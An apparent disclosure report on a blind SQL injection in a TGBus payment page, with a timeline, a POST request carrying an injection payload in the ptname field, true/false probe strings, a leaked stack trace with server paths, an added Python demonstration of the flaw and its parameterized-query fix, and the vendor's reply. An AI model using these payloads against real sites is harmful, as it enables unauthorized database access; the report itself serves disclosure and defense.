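2015-05-06: Details reported to the vendor, awaiting vendor handling
2015-05-06: Vendor has confirmed; details disclosed to the vendor only
2015-05-16: Details disclosed to core white hats and experts in related fields
2015-05-26: Details disclosed to regular white hats
2015-06-05: Details disclosed to trainee white hats
2015-06-20: Details disclosed to the public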
Boolean-based blind SQL injection in a TGBus (电玩巴士) site (with a length limit)
POST data
ctl00%24ContentPlaceHolder%24btn_edit=%c1%a2%bc%b4%b3%e4%d6%b5&ctl00%24ContentPlaceHolder%24droGameApp=107&ctl00%24ContentPlaceHolder%24package=15&ctl00%24ContentPlaceHolder%24ptname=admin' and lower(ascii(substring(db_name(),2,1)))<126--&ctl00%24ContentPlaceHolder%24ptname1=rpycaykj&__VIEWSTATE=/wEPDwUJOTk3MTgzMzA0D2QWAmYPZBYCAgkPZBYCAgMPZBYIZg8WAh4JaW5uZXJodG1sBQ/lroznvo7kuIDljaHpgJpkAgEPFgIfAAUM5pS75Z%2bO5o6g5ZywZAICDxAPFgYeDURhdGFUZXh0RmllbGQFB0FwcE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJRB4LXyFEYXRhQm91bmRnZBAVAg9TMiDnvqTpm4TpgJDpub8PUzEg5qGD5Zut57uT5LmJFQIDMTA3AzEwNRQrAwJnZ2RkAgcPEGQPFgRmAgECAgIDFgQQBQIxNQUCMTVnEAUCMzAFAjMwZxAFAjUwBQI1MGcQBQMxMDAFAzEwMGdkZGTmxthQ5sMzLHfV%2b9v2/pS3VumxZA%3d%3d
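At http://pay.tgbus.com/payment/payinfo.aspx?gameid=71&id=21 the ptname parameter is vulnerable to SQL injection.
ptname=admin' and 1=1--
ptname=admin' and 1=2--
These two values return different pages. ptname must be set to an existing user for this to work as a boolean-based injection; otherwise it is a time-based injection. In addition, appending a single ' on its own discloses the physical path: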
[SiteException: 引发类型为“Feixue.White.Framework.SiteException”的异常。]
   Feixue.White.DataProvider.DataEngin.Execute(String module, String sql, ExcuteMode excuteMode) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.DataProvider\DataEngin.cs:141
   Feixue.White.DataProvider.DataEngin.Execute(String module, String sql) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.DataProvider\DataEngin.cs:83
   Feixue.White.UserProvider.UserEngin.Get(String username, Boolean isPostUC) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.UserProvider\UserEngin.cs:515
   Feixue.White.UserProvider.UserEngin.Get(String username) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.UserProvider\UserEngin.cs:503
   Feixue.White.UserProvider.UserEngin.GetByUCUID(String username) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.UserProvider\UserEngin.cs:555
   Feixue.White.Ucenter.WebSite.payment.PayInfo.btn_pay_Click(Object sender, EventArgs e) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.Ucenter.WebSite\payment\PayInfo.aspx.cs:8
Using sqlmap to enumerate the current user:
I did not go any further.
Filter the parameter.
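The following is an added example, not code from the original report or from the site. It shows why the two ptname probes above differ only when the user exists, why a lone quote raises a database error, and how binding the value as a parameter removes both behaviours. SQLite stands in for the site's SQL Server backend; the users table and all function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite is a stand-in for the real backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    db.execute("INSERT INTO users (username) VALUES ('admin')")
    return db

def user_exists_concat(db, ptname):
    # 'Before' form: ptname is pasted into the SQL text, so a quote in it
    # closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT id FROM users WHERE username = '" + ptname + "'"
    return db.execute(sql).fetchone() is not None

def user_exists_bound(db, ptname):
    # Hardened form: ptname is bound as a value and never parsed as SQL.
    sql = "SELECT id FROM users WHERE username = ?"
    return db.execute(sql, (ptname,)).fetchone() is not None

def page_results(lookup, db, base):
    # Lookup outcome for the report's two probes appended to a user name.
    return (lookup(db, base + "' and 1=1--"),
            lookup(db, base + "' and 1=2--"))

def lone_quote_errors(lookup, db):
    # True if a single quote as input makes the database raise an error,
    # the condition behind the stack trace with physical paths.
    try:
        lookup(db, "'")
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concat", user_exists_concat),
                     ("bound", user_exists_bound)):
        print(name, "existing user:", page_results(fn, db, "admin"))
        print(name, "unknown user: ", page_results(fn, db, "nouser"))
        print(name, "lone quote errors:", lone_quote_errors(fn, db))
```

With the bound query the two probes are indistinguishable and the lone quote is just an unknown user name; returning a generic error page instead of the framework's stack trace covers the path disclosure separately.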
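Severity: High
Vulnerability Rank: 15
Confirmed: 2015-05-06 13:33
Thank you for your attention to Perfect World (完美世界). We will fix this vulnerability as soon as possible.
None yet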